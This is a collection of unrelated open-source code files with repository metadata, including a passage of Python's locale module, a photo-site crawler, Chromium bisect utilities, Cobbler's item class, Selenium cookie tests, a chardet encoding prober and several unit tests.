"xh_ZA", # Xhosa - South Africa 0x0485: 
"sah_RU",# Yakut - Cyrillic 0x0478: "ii_CN", # Yi - PRC 0x046a: "yo_NG", # Yoruba - Nigeria 0x0435: "zu_ZA", # Zulu } def _print_locale(): """ Test function. """ categories = {} def _init_categories(categories=categories): for k,v in globals().items(): if k[:3] == 'LC_': categories[k] = v _init_categories() del categories['LC_ALL'] print 'Locale defaults as determined by getdefaultlocale():' print '-'*72 lang, enc = getdefaultlocale() print 'Language: ', lang or '(undefined)' print 'Encoding: ', enc or '(undefined)' print print 'Locale settings on startup:' print '-'*72 for name,category in categories.items(): print name, '...' lang, enc = getlocale(category) print ' Language: ', lang or '(undefined)' print ' Encoding: ', enc or '(undefined)' print print print 'Locale settings after calling resetlocale():' print '-'*72 resetlocale() for name,category in categories.items(): print name, '...' lang, enc = getlocale(category) print ' Language: ', lang or '(undefined)' print ' Encoding: ', enc or '(undefined)' print try: setlocale(LC_ALL, "") except: print 'NOTE:' print 'setlocale(LC_ALL, "") does not support the default locale' print 'given in the OS environment variables.' else: print print 'Locale settings after calling setlocale(LC_ALL, ""):' print '-'*72 for name,category in categories.items(): print name, '...' lang, enc = getlocale(category) print ' Language: ', lang or '(undefined)' print ' Encoding: ', enc or '(undefined)' print ### try: LC_MESSAGES except NameError: pass else: __all__.append("LC_MESSAGES") if __name__=='__main__': print 'Locale aliasing:' print _print_locale() print print 'Number formatting:' print _test()
gpl-3.0
mikoim/funstuff
null/crawler/tt2db.py
1
1709
# -*- coding: utf-8 -*- import urllib.request import time import pymongo import http.client import re def httpWrapper(url): try: data_raw = urllib.request.urlopen(url).read().decode('utf-8') except: return "NULL" return data_raw def getGirlName(data_raw): matches = re.findall('名前[ ]+?/[ ]+?(.+?)(|\n)*( |)*(|\n)*( |)*(\(|<br />)', data_raw) for match in matches[0]: return match.replace(' ', '') return def getGrilPhotos(data_raw): matches = re.findall('<span>(photos/.+?.jpg)</span>', data_raw) if len(matches) == 0: matches = re.findall('<a href="(photos/.+?.jpg)">', data_raw) return matches def getLastModTime(path): conn = http.client.HTTPConnection("twintail-japan.com") conn.request("HEAD", path) res = conn.getresponse() return int(time.mktime(time.strptime(res.getheaders()[2][1], '%a, %d %b %Y %H:%M:%S %Z')) * 1000) conn = pymongo.Connection() db = conn.tw2db col = db.tm for x in range(1, 3): baseUrl = "http://twintail-japan.com/sailor/contents/%d.html" % x data_raw = httpWrapper(baseUrl) if data_raw != "NULL": name = getGirlName(data_raw) for photo in getGrilPhotos(data_raw): dbtml = {'author' : '', 'time' : '', 'title' : '', 'via' : '', 'src' : '', 'message' : ''} dbtml['author'] = name dbtml['title'] = name + " @ セーラ服とツインテール" dbtml['via'] = baseUrl dbtml['message'] = "" dbtml['time'] = getLastModTime("/sailor/contents/%d.html" % x) dbtml['src'] = 'http://twintail-japan.com/sailor/contents/%s' % (photo) col.insert(dbtml) print(x)
mit
sencha/chromium-spacewalk
tools/auto_bisect/bisect_utils.py
6
16659
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Utility functions used by the bisect tool. This includes functions related to checking out the depot and outputting annotations for the Buildbot waterfall. """ import errno import imp import os import shutil import stat import subprocess import sys DEFAULT_GCLIENT_CUSTOM_DEPS = { 'src/data/page_cycler': 'https://chrome-internal.googlesource.com/' 'chrome/data/page_cycler/.git', 'src/data/dom_perf': 'https://chrome-internal.googlesource.com/' 'chrome/data/dom_perf/.git', 'src/data/mach_ports': 'https://chrome-internal.googlesource.com/' 'chrome/data/mach_ports/.git', 'src/tools/perf/data': 'https://chrome-internal.googlesource.com/' 'chrome/tools/perf/data/.git', 'src/third_party/adobe/flash/binaries/ppapi/linux': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/linux/.git', 'src/third_party/adobe/flash/binaries/ppapi/linux_x64': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/linux_x64/.git', 'src/third_party/adobe/flash/binaries/ppapi/mac': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/mac/.git', 'src/third_party/adobe/flash/binaries/ppapi/mac_64': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/mac_64/.git', 'src/third_party/adobe/flash/binaries/ppapi/win': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/win/.git', 'src/third_party/adobe/flash/binaries/ppapi/win_x64': 'https://chrome-internal.googlesource.com/' 'chrome/deps/adobe/flash/binaries/ppapi/win_x64/.git', 'src/chrome/tools/test/reference_build/chrome_win': None, 'src/chrome/tools/test/reference_build/chrome_mac': None, 'src/chrome/tools/test/reference_build/chrome_linux': None, 'src/third_party/WebKit/LayoutTests': None, 'src/tools/valgrind': None, } 
GCLIENT_SPEC_DATA = [ { 'name': 'src', 'url': 'https://chromium.googlesource.com/chromium/src.git', 'deps_file': '.DEPS.git', 'managed': True, 'custom_deps': {}, 'safesync_url': '', }, ] GCLIENT_SPEC_ANDROID = "\ntarget_os = ['android']" GCLIENT_CUSTOM_DEPS_V8 = {'src/v8_bleeding_edge': 'git://github.com/v8/v8.git'} FILE_DEPS_GIT = '.DEPS.git' FILE_DEPS = 'DEPS' REPO_SYNC_COMMAND = ('git checkout -f $(git rev-list --max-count=1 ' '--before=%d remotes/m/master)') # Paths to CrOS-related files. # WARNING(qyearsley, 2014-08-15): These haven't been tested recently. CROS_SDK_PATH = os.path.join('..', 'cros', 'chromite', 'bin', 'cros_sdk') CROS_TEST_KEY_PATH = os.path.join( '..', 'cros', 'chromite', 'ssh_keys', 'testing_rsa') CROS_SCRIPT_KEY_PATH = os.path.join( '..', 'cros', 'src', 'scripts', 'mod_for_test_scripts', 'ssh_keys', 'testing_rsa') REPO_PARAMS = [ 'https://chrome-internal.googlesource.com/chromeos/manifest-internal/', '--repo-url', 'https://git.chromium.org/external/repo.git' ] def OutputAnnotationStepStart(name): """Outputs annotation to signal the start of a step to a trybot. Args: name: The name of the step. """ print print '@@@SEED_STEP %s@@@' % name print '@@@STEP_CURSOR %s@@@' % name print '@@@STEP_STARTED@@@' print sys.stdout.flush() def OutputAnnotationStepClosed(): """Outputs annotation to signal the closing of a step to a trybot.""" print print '@@@STEP_CLOSED@@@' print sys.stdout.flush() def OutputAnnotationStepLink(label, url): """Outputs appropriate annotation to print a link. Args: label: The name to print. url: The url to print. """ print print '@@@STEP_LINK@%s@%s@@@' % (label, url) print sys.stdout.flush() def LoadExtraSrc(path_to_file): """Attempts to load an extra source file, and overrides global values. If the extra source file is loaded successfully, then it will use the new module to override some global values, such as gclient spec data. Args: path_to_file: File path. Returns: The loaded module object, or None if none was imported. 
""" try: global GCLIENT_SPEC_DATA global GCLIENT_SPEC_ANDROID extra_src = imp.load_source('data', path_to_file) GCLIENT_SPEC_DATA = extra_src.GetGClientSpec() GCLIENT_SPEC_ANDROID = extra_src.GetGClientSpecExtraParams() return extra_src except ImportError: return None def IsTelemetryCommand(command): """Attempts to discern whether or not a given command is running telemetry.""" return ('tools/perf/run_' in command or 'tools\\perf\\run_' in command) def _CreateAndChangeToSourceDirectory(working_directory): """Creates a directory 'bisect' as a subdirectory of |working_directory|. If successful, the current working directory will be changed to the new 'bisect' directory. Args: working_directory: The directory to create the new 'bisect' directory in. Returns: True if the directory was successfully created (or already existed). """ cwd = os.getcwd() os.chdir(working_directory) try: os.mkdir('bisect') except OSError, e: if e.errno != errno.EEXIST: # EEXIST indicates that it already exists. os.chdir(cwd) return False os.chdir('bisect') return True def _SubprocessCall(cmd, cwd=None): """Runs a subprocess with specified parameters. Args: params: A list of parameters to pass to gclient. cwd: Working directory to run from. Returns: The return code of the call. """ if os.name == 'nt': # "HOME" isn't normally defined on windows, but is needed # for git to find the user's .netrc file. if not os.getenv('HOME'): os.environ['HOME'] = os.environ['USERPROFILE'] shell = os.name == 'nt' return subprocess.call(cmd, shell=shell, cwd=cwd) def RunGClient(params, cwd=None): """Runs gclient with the specified parameters. Args: params: A list of parameters to pass to gclient. cwd: Working directory to run from. Returns: The return code of the call. """ cmd = ['gclient'] + params return _SubprocessCall(cmd, cwd=cwd) def SetupCrosRepo(): """Sets up CrOS repo for bisecting ChromeOS. Returns: True if successful, False otherwise. 
""" cwd = os.getcwd() try: os.mkdir('cros') except OSError as e: if e.errno != errno.EEXIST: # EEXIST means the directory already exists. return False os.chdir('cros') cmd = ['init', '-u'] + REPO_PARAMS passed = False if not _RunRepo(cmd): if not _RunRepo(['sync']): passed = True os.chdir(cwd) return passed def _RunRepo(params): """Runs CrOS repo command with specified parameters. Args: params: A list of parameters to pass to gclient. Returns: The return code of the call (zero indicates success). """ cmd = ['repo'] + params return _SubprocessCall(cmd) def RunRepoSyncAtTimestamp(timestamp): """Syncs all git depots to the timestamp specified using repo forall. Args: params: Unix timestamp to sync to. Returns: The return code of the call. """ cmd = ['forall', '-c', REPO_SYNC_COMMAND % timestamp] return _RunRepo(cmd) def RunGClientAndCreateConfig(opts, custom_deps=None, cwd=None): """Runs gclient and creates a config containing both src and src-internal. Args: opts: The options parsed from the command line through parse_args(). custom_deps: A dictionary of additional dependencies to add to .gclient. cwd: Working directory to run from. Returns: The return code of the call. """ spec = GCLIENT_SPEC_DATA if custom_deps: for k, v in custom_deps.iteritems(): spec[0]['custom_deps'][k] = v # Cannot have newlines in string on windows spec = 'solutions =' + str(spec) spec = ''.join([l for l in spec.splitlines()]) if 'android' in opts.target_platform: spec += GCLIENT_SPEC_ANDROID return_code = RunGClient( ['config', '--spec=%s' % spec, '--git-deps'], cwd=cwd) return return_code def IsDepsFileBlink(): """Reads .DEPS.git and returns whether or not we're using blink. Returns: True if blink, false if webkit. """ locals = { 'Var': lambda _: locals["vars"][_], 'From': lambda *args: None } execfile(FILE_DEPS_GIT, {}, locals) return 'blink.git' in locals['vars']['webkit_url'] def OnAccessError(func, path, _): """Error handler for shutil.rmtree. 
Source: http://goo.gl/DEYNCT If the error is due to an access error (read only file), it attempts to add write permissions, then retries. If the error is for another reason it re-raises the error. Args: func: The function that raised the error. path: The path name passed to func. _: Exception information from sys.exc_info(). Not used. """ if not os.access(path, os.W_OK): os.chmod(path, stat.S_IWUSR) func(path) else: raise def RemoveThirdPartyDirectory(dir_name): """Removes third_party directory from the source. At some point, some of the third_parties were causing issues to changes in the way they are synced. We remove such folder in order to avoid sync errors while bisecting. Returns: True on success, otherwise False. """ path_to_dir = os.path.join(os.getcwd(), 'third_party', dir_name) try: if os.path.exists(path_to_dir): shutil.rmtree(path_to_dir, onerror=OnAccessError) except OSError, e: print 'Error #%d while running shutil.rmtree(%s): %s' % ( e.errno, path_to_dir, str(e)) if e.errno != errno.ENOENT: return False return True def _CleanupPreviousGitRuns(): """Cleans up any leftover index.lock files after running git.""" # If a previous run of git crashed, or bot was reset, etc., then we might # end up with leftover index.lock files. for path, _, files in os.walk(os.getcwd()): for cur_file in files: if cur_file.endswith('index.lock'): path_to_file = os.path.join(path, cur_file) os.remove(path_to_file) def RunGClientAndSync(cwd=None): """Runs gclient and does a normal sync. Args: cwd: Working directory to run from. Returns: The return code of the call. """ params = ['sync', '--verbose', '--nohooks', '--reset', '--force'] return RunGClient(params, cwd=cwd) def SetupGitDepot(opts, custom_deps): """Sets up the depot for the bisection. The depot will be located in a subdirectory called 'bisect'. Args: opts: The options parsed from the command line through parse_args(). custom_deps: A dictionary of additional dependencies to add to .gclient. 
Returns: True if gclient successfully created the config file and did a sync, False otherwise. """ name = 'Setting up Bisection Depot' if opts.output_buildbot_annotations: OutputAnnotationStepStart(name) passed = False if not RunGClientAndCreateConfig(opts, custom_deps): passed_deps_check = True if os.path.isfile(os.path.join('src', FILE_DEPS_GIT)): cwd = os.getcwd() os.chdir('src') if not IsDepsFileBlink(): passed_deps_check = RemoveThirdPartyDirectory('Webkit') else: passed_deps_check = True if passed_deps_check: passed_deps_check = RemoveThirdPartyDirectory('libjingle') if passed_deps_check: passed_deps_check = RemoveThirdPartyDirectory('skia') os.chdir(cwd) if passed_deps_check: _CleanupPreviousGitRuns() RunGClient(['revert']) if not RunGClientAndSync(): passed = True if opts.output_buildbot_annotations: print OutputAnnotationStepClosed() return passed def CheckIfBisectDepotExists(opts): """Checks if the bisect directory already exists. Args: opts: The options parsed from the command line through parse_args(). Returns: Returns True if it exists. """ path_to_dir = os.path.join(opts.working_directory, 'bisect', 'src') return os.path.exists(path_to_dir) def CheckRunGit(command, cwd=None): """Run a git subcommand, returning its output and return code. Asserts if the return code of the call is non-zero. Args: command: A list containing the args to git. Returns: A tuple of the output and return code. """ (output, return_code) = RunGit(command, cwd=cwd) assert not return_code, 'An error occurred while running'\ ' "git %s"' % ' '.join(command) return output def RunGit(command, cwd=None): """Run a git subcommand, returning its output and return code. Args: command: A list containing the args to git. cwd: A directory to change to while running the git command (optional). Returns: A tuple of the output and return code. 
""" command = ['git'] + command return RunProcessAndRetrieveOutput(command, cwd=cwd) def CreateBisectDirectoryAndSetupDepot(opts, custom_deps): """Sets up a subdirectory 'bisect' and then retrieves a copy of the depot there using gclient. Args: opts: The options parsed from the command line through parse_args(). custom_deps: A dictionary of additional dependencies to add to .gclient. """ if not _CreateAndChangeToSourceDirectory(opts.working_directory): raise RuntimeError('Could not create bisect directory.') if not SetupGitDepot(opts, custom_deps): raise RuntimeError('Failed to grab source.') def RunProcess(command): """Runs an arbitrary command. If output from the call is needed, use RunProcessAndRetrieveOutput instead. Args: command: A list containing the command and args to execute. Returns: The return code of the call. """ # On Windows, use shell=True to get PATH interpretation. shell = IsWindowsHost() return subprocess.call(command, shell=shell) def RunProcessAndRetrieveOutput(command, cwd=None): """Runs an arbitrary command, returning its output and return code. Since output is collected via communicate(), there will be no output until the call terminates. If you need output while the program runs (ie. so that the buildbot doesn't terminate the script), consider RunProcess(). Args: command: A list containing the command and args to execute. cwd: A directory to change to while running the command. The command can be relative to this directory. If this is None, the command will be run in the current directory. Returns: A tuple of the output and return code. """ if cwd: original_cwd = os.getcwd() os.chdir(cwd) # On Windows, use shell=True to get PATH interpretation. shell = IsWindowsHost() proc = subprocess.Popen(command, shell=shell, stdout=subprocess.PIPE) (output, _) = proc.communicate() if cwd: os.chdir(original_cwd) return (output, proc.returncode) def IsStringInt(string_to_check): """Checks whether or not the given string can be converted to a integer. 
Args: string_to_check: Input string to check if it can be converted to an int. Returns: True if the string can be converted to an int. """ try: int(string_to_check) return True except ValueError: return False def IsStringFloat(string_to_check): """Checks whether or not the given string can be converted to a floating point number. Args: string_to_check: Input string to check if it can be converted to a float. Returns: True if the string can be converted to a float. """ try: float(string_to_check) return True except ValueError: return False def IsWindowsHost(): """Checks whether or not the script is running on Windows. Returns: True if running on Windows. """ return sys.platform == 'cygwin' or sys.platform.startswith('win') def Is64BitWindows(): """Returns whether or not Windows is a 64-bit version. Returns: True if Windows is 64-bit, False if 32-bit. """ platform = os.environ['PROCESSOR_ARCHITECTURE'] try: platform = os.environ['PROCESSOR_ARCHITEW6432'] except KeyError: # Must not be running in WoW64, so PROCESSOR_ARCHITECTURE is correct pass return platform in ['AMD64', 'I64'] def IsLinuxHost(): """Checks whether or not the script is running on Linux. Returns: True if running on Linux. """ return sys.platform.startswith('linux') def IsMacHost(): """Checks whether or not the script is running on Mac. Returns: True if running on Mac. """ return sys.platform.startswith('darwin')
bsd-3-clause
jdobes/cobbler
cobbler/item.py
1
13896
""" An Item is a serializable thing that can appear in a Collection Copyright 2006-2009, Red Hat, Inc Michael DeHaan <mdehaan@redhat.com> This software may be freely redistributed under the terms of the GNU general public license. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. """ import exceptions import utils from cexceptions import * from utils import _ import pprint import fnmatch class Item: TYPE_NAME = "generic" def __init__(self,config,is_subobject=False): """ Constructor. Requires a back reference to the Config management object. NOTE: is_subobject is used for objects that allow inheritance in their trees. This inheritance refers to conceptual inheritance, not Python inheritance. Objects created with is_subobject need to call their set_parent() method immediately after creation and pass in a value of an object of the same type. Currently this is only supported for profiles. Subobjects blend their data with their parent objects and only require a valid parent name and a name for themselves, so other required options can be gathered from items further up the cobbler tree. Old cobbler: New cobbler: distro distro profile profile system profile <-- created with is_subobject=True system <-- created as normal For consistancy, there is some code supporting this in all object types, though it is only usable (and only should be used) for profiles at this time. Objects that are children of objects of the same type (i.e. subprofiles) need to pass this in as True. Otherwise, just use False for is_subobject and the parent object will (therefore) have a different type. 
""" self.config = config self.settings = self.config._settings self.clear(is_subobject) # reset behavior differs for inheritance cases self.parent = '' # all objects by default are not subobjects self.children = {} # caching for performance reasons, not serialized self.log_func = self.config.api.log self.ctime = 0 # to be filled in by collection class self.mtime = 0 # to be filled in by collection class self.uid = "" # to be filled in by collection class self.last_cached_mtime = 0 self.cached_datastruct = "" def clear(self,is_subobject=False): """ Reset this object. """ utils.clear_from_fields(self,self.get_fields(),is_subobject=is_subobject) def make_clone(self): raise exceptions.NotImplementedError def from_datastruct(self,seed_data): """ Modify this object to take on values in seed_data """ return utils.from_datastruct_from_fields(self,seed_data,self.get_fields()) def to_datastruct(self): return utils.to_datastruct_from_fields(self, self.get_fields()) def printable(self): return utils.printable_from_fields(self,self.get_fields()) def remote_methods(self): return utils.get_remote_methods_from_fields(self,self.get_fields()) def set_uid(self,uid): self.uid = uid def get_children(self,sorted=True): """ Get direct children of this object. """ keys = self.children.keys() if sorted: keys.sort() results = [] for k in keys: results.append(self.children[k]) return results def get_descendants(self): """ Get objects that depend on this object, i.e. those that would be affected by a cascading delete, etc. """ results = [] kids = self.get_children(sorted=False) results.extend(kids) for kid in kids: grandkids = kid.get_descendants() results.extend(grandkids) return results def get_parent(self): """ For objects with a tree relationship, what's the parent object? """ return None def get_conceptual_parent(self): """ The parent may just be a superclass for something like a subprofile. Get the first parent of a different type. 
""" # FIXME: this is a workaround to get the type of an instance var # what's a more clean way to do this that's python 2.3 friendly? # this returns something like: cobbler.item_system.System mtype = str(self).split(" ")[0][1:] parent = self.get_parent() while parent is not None: ptype = str(parent).split(" ")[0][1:] if mtype != ptype: self.conceptual_parent = parent return parent parent = parent.get_parent() return None def set_name(self,name): """ All objects have names, and with the exception of System they aren't picky about it. """ if self.name not in ["",None] and self.parent not in ["",None] and self.name == self.parent: raise CX(_("self parentage is weird")) if not isinstance(name, basestring): raise CX(_("name must be a string")) for x in name: if not x.isalnum() and not x in [ "_", "-", ".", ":", "+" ] : raise CX(_("invalid characters in name: '%s'" % name)) self.name = name return True def set_comment(self, comment): if comment is None: comment = "" self.comment = comment return True def set_owners(self,data): """ The owners field is a comment unless using an authz module that pays attention to it, like authz_ownership, which ships with Cobbler but is off by default. Consult the Wiki docs for more info on CustomizableAuthorization. """ owners = utils.input_string_or_list(data) self.owners = owners return True def set_kernel_options(self,options,inplace=False): """ Kernel options are a space delimited list, like 'a=b c=d e=f g h i=j' or a hash. """ (success, value) = utils.input_string_or_hash(options) if not success: raise CX(_("invalid kernel options")) else: if inplace: for key in value.keys(): if key.startswith("~"): del self.kernel_options[key[1:]] else: self.kernel_options[key] = value[key] else: self.kernel_options = value return True def set_kernel_options_post(self,options,inplace=False): """ Post kernel options are a space delimited list, like 'a=b c=d e=f g h i=j' or a hash. 
""" (success, value) = utils.input_string_or_hash(options) if not success: raise CX(_("invalid post kernel options")) else: if inplace: for key in value.keys(): if key.startswith("~"): del self.self.kernel_options_post[key[1:]] else: self.kernel_options_post[key] = value[key] else: self.kernel_options_post = value return True def set_ks_meta(self,options,inplace=False): """ A comma delimited list of key value pairs, like 'a=b,c=d,e=f' or a hash. The meta tags are used as input to the templating system to preprocess kickstart files """ (success, value) = utils.input_string_or_hash(options,allow_multiples=False) if not success: return False else: if inplace: for key in value.keys(): if key.startswith("~"): del self.ks_meta[key[1:]] else: self.ks_meta[key] = value[key] else: self.ks_meta = value return True def set_mgmt_classes(self,mgmt_classes): """ Assigns a list of configuration management classes that can be assigned to any object, such as those used by Puppet's external_nodes feature. """ mgmt_classes_split = utils.input_string_or_list(mgmt_classes) self.mgmt_classes = utils.input_string_or_list(mgmt_classes_split) return True def set_template_files(self,template_files,inplace=False): """ A comma seperated list of source=destination templates that should be generated during a sync. 
""" (success, value) = utils.input_string_or_hash(template_files,allow_multiples=False) if not success: return False else: if inplace: for key in value.keys(): if key.startswith("~"): del self.template_files[key[1:]] else: self.template_files[key] = value[key] else: self.template_files = value return True def sort_key(self,sort_fields=[]): data = self.to_datastruct() return [data.get(x,"") for x in sort_fields] def find_match(self,kwargs,no_errors=False): # used by find() method in collection.py data = self.to_datastruct() for (key, value) in kwargs.iteritems(): # Allow ~ to negate the compare if value is not None and value.startswith("~"): res=not self.find_match_single_key(data,key,value[1:],no_errors) else: res=self.find_match_single_key(data,key,value,no_errors) if not res: return False return True def find_match_single_key(self,data,key,value,no_errors=False): # special case for systems key_found_already = False if data.has_key("interfaces"): if key in [ "mac_address", "ip_address", "subnet", "netmask", "virt_bridge", \ "dhcp_tag", "dns_name", "static_routes", "interface_type", \ "interface_master", "bonding_opts", "bridge_opts", "bonding", "bonding_master" ]: if key == "bonding": key = "interface_type" # bonding is deprecated elif key == "bonding_master": key = "interface_master" # bonding_master is deprecated key_found_already = True for (name, interface) in data["interfaces"].iteritems(): if value is not None and interface.has_key(key): if self.__find_compare(interface[key], value): return True if not data.has_key(key): if not key_found_already: if not no_errors: # FIXME: removed for 2.0 code, shouldn't cause any problems to not have an exception here? # raise CX(_("searching for field that does not exist: %s" % key)) return False else: if value is not None: # FIXME: new? 
return False if value is None: return True else: return self.__find_compare(value, data[key]) def __find_compare(self, from_search, from_obj): if isinstance(from_obj, basestring): # FIXME: fnmatch is only used for string to string comparisions # which should cover most major usage, if not, this deserves fixing if fnmatch.fnmatch(from_obj.lower(), from_search.lower()): return True else: return False else: if isinstance(from_search, basestring): if type(from_obj) == type([]): from_search = utils.input_string_or_list(from_search) for x in from_search: if x not in from_obj: return False return True if type(from_obj) == type({}): (junk, from_search) = utils.input_string_or_hash(from_search,allow_multiples=True) for x in from_search.keys(): y = from_search[x] if not from_obj.has_key(x): return False if not (y == from_obj[x]): return False return True if type(from_obj) == type(True): if from_search.lower() in [ "true", "1", "y", "yes" ]: inp = True else: inp = False if inp == from_obj: return True return False raise CX(_("find cannot compare type: %s") % type(from_obj)) def dump_vars(self,data,format=True): raw = utils.blender(self.config.api, False, self) if format: return pprint.pformat(raw) else: return raw def set_depth(self,depth): self.depth = depth def set_ctime(self,ctime): self.ctime = ctime def set_mtime(self,mtime): self.mtime = mtime def set_parent(self,parent): self.parent = parent def check_if_valid(self): """ Raise exceptions if the object state is inconsistent """ if self.name is None or self.name == "": raise CX("Name is required")
gpl-2.0
bwp/SeleniumWebDriver
py/test/selenium/webdriver/common/cookie_tests.py
28
3282
import calendar import time import unittest import random import pytest from selenium.test.selenium.webdriver.common import utils class CookieTest(unittest.TestCase): def setUp(self): self._loadPage("simpleTest") # Set the cookie to expire in 30 minutes timestamp = calendar.timegm(time.gmtime()) + (30 * 60) self.COOKIE_A = {"name": "foo", "value": "bar", "path": "/", "secure": False} def tearDown(self): self.driver.delete_all_cookies() def testAddCookie(self): self.driver.execute_script("return document.cookie") self.driver.add_cookie(self.COOKIE_A) cookie_returned = str(self.driver.execute_script("return document.cookie")) self.assertTrue(self.COOKIE_A["name"] in cookie_returned) def testAddingACookieThatExpiredInThePast(self): if self.driver.name == 'internet explorer': pytest.skip("Issue needs investigating") cookie = self.COOKIE_A.copy() cookie["expiry"] = calendar.timegm(time.gmtime()) - 1 self.driver.add_cookie(cookie) cookies = self.driver.get_cookies() self.assertEquals(0, len(cookies)) def testDeleteAllCookie(self): self.driver.add_cookie(utils.convert_cookie_to_json(self.COOKIE_A)) self.driver.delete_all_cookies() self.assertFalse(self.driver.get_cookies()) def testDeleteCookie(self): self.driver.add_cookie(utils.convert_cookie_to_json(self.COOKIE_A)) self.driver.delete_cookie("foo") self.assertFalse(self.driver.get_cookies()) def testShouldGetCookieByName(self): key = "key_%d" % int(random.random()*10000000) self.driver.execute_script("document.cookie = arguments[0] + '=set';", key) cookie = self.driver.get_cookie(key) self.assertEquals("set", cookie["value"]) def testGetAllCookies(self): key1 = "key_%d" % int(random.random()*10000000) key2 = "key_%d" % int(random.random()*10000000) cookies = self.driver.get_cookies() count = len(cookies) one = {"name" :key1, "value": "value"} two = {"name":key2, "value": "value"} self.driver.add_cookie(one) self.driver.add_cookie(two) self._loadPage("simpleTest") cookies = self.driver.get_cookies() 
self.assertEquals(count + 2, len(cookies)) def testShouldNotDeleteCookiesWithASimilarName(self): cookieOneName = "fish" cookie1 = {"name" :cookieOneName, "value":"cod"} cookie2 = {"name" :cookieOneName + "x", "value": "earth"} self.driver.add_cookie(cookie1) self.driver.add_cookie(cookie2) self.driver.delete_cookie(cookieOneName) cookies = self.driver.get_cookies() self.assertFalse(cookie1["name"] == cookies[0]["name"], msg=str(cookies)) self.assertEquals(cookie2["name"] , cookies[0]["name"], msg=str(cookies)) def _loadPage(self, name): self.driver.get(self._pageURL(name)) def _pageURL(self, name): return "http://localhost:%d/%s.html" % (self.webserver.port, name)
apache-2.0
abhikumar22/MYBLOG
blg/Lib/site-packages/pip/_vendor/requests/packages/chardet/euctwprober.py
2994
1676
######################## BEGIN LICENSE BLOCK ######################## # The Original Code is mozilla.org code. # # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. # # Contributor(s): # Mark Pilgrim - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### from .mbcharsetprober import MultiByteCharSetProber from .codingstatemachine import CodingStateMachine from .chardistribution import EUCTWDistributionAnalysis from .mbcssm import EUCTWSMModel class EUCTWProber(MultiByteCharSetProber): def __init__(self): MultiByteCharSetProber.__init__(self) self._mCodingSM = CodingStateMachine(EUCTWSMModel) self._mDistributionAnalyzer = EUCTWDistributionAnalysis() self.reset() def get_charset_name(self): return "EUC-TW"
gpl-3.0
Jannes123/inasafe
safe/utilities/test/test_printing.py
10
1055
__author__ = 'timlinux' import unittest from safe.utilities.printing import ( mm_to_points, points_to_mm, dpi_to_meters) class TestPrinting(unittest.TestCase): def test_mm_to_points(self): """Test that conversions between pixel and page dimensions work.""" dpi = 300 pixels = 300 mm = 25.4 # 1 inch result = points_to_mm(pixels, dpi) message = "Expected: %s\nGot: %s" % (mm, result) assert result == mm, message result = mm_to_points(mm, dpi) message = "Expected: %s\nGot: %s" % (pixels, result) assert result == pixels, message def test_dpi_to_meters(self): """Test conversion from dpi to dpm.""" dpi = 300 dpm = dpi_to_meters(dpi) expected_dpm = 11811.023622 message = ( 'Conversion from dpi to dpm failed\n' ' Got: %s Expected: %s\n' % (dpm, expected_dpm)) self.assertAlmostEqual(dpm, expected_dpm, msg=message) if __name__ == '__main__': unittest.main()
gpl-3.0
yac/packstack
tests/installer/test_processors.py
5
1621
# -*- coding: utf-8 -*- # vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2013, Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import shutil import tempfile from unittest import TestCase from packstack.installer.processors import * from ..test_base import PackstackTestCaseMixin class ProcessorsTestCase(PackstackTestCaseMixin, TestCase): def test_process_host(self): """Test packstack.installer.processors.process_host""" proc_local = process_host('localhost', process_args={'allow_localhost': True}) self.assertIn(proc_local, ['127.0.0.1', '::1']) def test_process_ssh_key(self): """Test packstack.installer.processors.process_ssh_key""" path = process_ssh_key(os.path.join(self.tempdir, 'id_rsa')) # test if key was created self.assertEquals(True, bool(path)) # test if key exists # XXX: process_ssh_key does not create ssh key during test run # ... not sure why, nevertheless it works in normal run #self.assertEquals(True, os.path.isfile(path))
apache-2.0
Tetpay/cjdns
node_build/dependencies/libuv/build/gyp/test/mac/gyptest-xcode-env-order.py
75
3463
